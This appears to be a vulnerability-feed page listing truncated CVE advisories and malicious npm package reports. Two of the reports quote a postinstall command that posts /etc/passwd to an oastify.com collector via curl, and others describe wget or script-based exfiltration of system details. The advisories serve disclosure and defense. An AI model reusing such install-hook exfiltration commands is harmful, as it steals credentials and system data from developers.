Malicious code in morningstar-design-system (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 18591ac1a5cb5ca3d11e07bde38f230dccc530bb4614d45f9be1f547677a2c9e On npm install, the package's preinstall lifecycle script runs wget against a hardcoded bare-IP HTTP endpoint, passing the output of id, pwd, hostnam...

CVE-2026-28237

Unrestricted resource allocation in AMD uProf may be exploitable to consume excessive system resources, potentially leading to a loss of availability...

Exploit for CVE-2026-46394

CVE-2026-46394 - HAXcms Git.php OS Command Injection CWE-78...

Malicious code in @shell-cabinet/routes (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector b385f020626d8bad774fe5ebd776683b547bea4edef85944af658fd0155924ad On npm install, the package's postinstall hook runs curl --data '@/etc/passwd' $hostname.200hj786m7x4kfz1lkr4kmshu80zoqcf.oastify.com, posting the...

MAL-2026-5428 Malicious code in @shell-cabinet/routes (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector b385f020626d8bad774fe5ebd776683b547bea4edef85944af658fd0155924ad On npm install, the package's postinstall hook runs curl --data '@/etc/passwd' $hostname.200hj786m7x4kfz1lkr4kmshu80zoqcf.oastify.com, posting the...

CVE-2026-45636

Heap-based buffer overflow in Windows NTFS allows an unauthorized attacker to execute code locally...

CVE-2026-44809

Use after free in Windows Common Log File System Driver allows an authorized attacker to elevate privileges locally...

CVE-2026-42837

Buffer over-read in Windows Projected File System Filter Driver allows an authorized attacker to elevate privileges locally...

CVE-2026-42828

Buffer over-read in Windows Projected File System Filter Driver allows an authorized attacker to elevate privileges locally...

CVE-2026-41108

Heap-based buffer overflow in Microsoft Windows DNS allows an authorized attacker to elevate privileges locally...

CVE-2026-40404

Windows Universal Disk Format File System Driver UDFS Elevation of Privilege Vulnerability...

CVE-2026-40409

Windows Universal Disk Format File System Driver UDFS Elevation of Privilege Vulnerability...

CVE-2026-22926

Omnissa Workspace ONE® Assist for macOS contains a Local Privilege Escalation Vulnerability...

CVE-2026-0418

Insufficient configuration management in the listed devices allows authenticated administrators connected to the local network to tamper with the system...

MAL-2026-5425 Malicious code in @oplus/obus-web-sdk (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 956ecc19633177f7ef9b458e6407ffbba6c8366688249c07bfd7f3c8e85c17a9 On npm install, the package's scripts/postinstall.js collects the installer's username os.userInfo, hostname os.hostname, current working directory...

CVE-2026-44804 Windows DWM Core Library Elevation of Privilege Vulnerability

...

CVE-2026-44813 Windows DWM Core Library Elevation of Privilege Vulnerability

...

CVE-2026-44809 Windows Common Log File System Driver Elevation of Privilege Vulnerability

...

EUVD-2026-35743

Use after free in Windows Common Log File System Driver allows an authorized attacker to elevate privileges locally...

CVE-2026-44809

The vulnerability CVE-2026-44809 involves use-after-free in the Windows Common Log File System (CLFS) Driver. An authorized local attacker can elevate privileges. The data provided does not specify affected Windows versions, patch details, or remediation steps. No exploit specifics are documented...